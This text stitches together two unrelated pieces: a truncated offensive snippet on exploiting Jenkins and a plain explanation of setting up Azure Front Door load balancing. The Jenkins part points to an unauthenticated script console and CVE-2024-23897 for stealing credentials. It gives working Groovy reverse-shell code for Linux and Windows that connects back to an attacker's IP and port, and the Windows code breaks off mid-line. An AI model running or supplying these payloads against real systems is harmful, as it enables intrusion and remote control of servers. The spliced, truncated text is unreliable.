Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Azure Front Door is a combination of Load-balancer and Web Application Firewall (WAF). It is a routing service that helps to accelerate the application access availability and performance and works at the Application layer.
Azure Front Door service can be considered when you have a pool of application servers at the back-end and you need to load-balance the client requests and enhance the security. When you implement this service, it will route the client requests to the fastest and most available application back-end. These requests can be distributed to the back-end pool based on Weight-age and Priority.
Azure Front Door service features,
1) URL based routing
2) Maintaining session affinity
3) SSL termination
4) Web Application Firewall Features.
You can configure Azure Front Door in three steps.
Search Front Door service from your Azure dashboard.
1) Add the front-end hosts / Domain name.
- Configure the front-end URL. User requests will hit here. You can enable affinity and WAF at this section.
2) Configure the Back-end pool
- Here you need to add all the back-end applications or app servers/endpoints.
- Once you add the applications, you need to configure the health probes as well.
- Priority and Weight-age for the endpoints can be configured here
3) Routing rules
- In this part, you maps the front-end host and a matching URL path pattern to a specific back-end pool. Same as a load-balancing rule.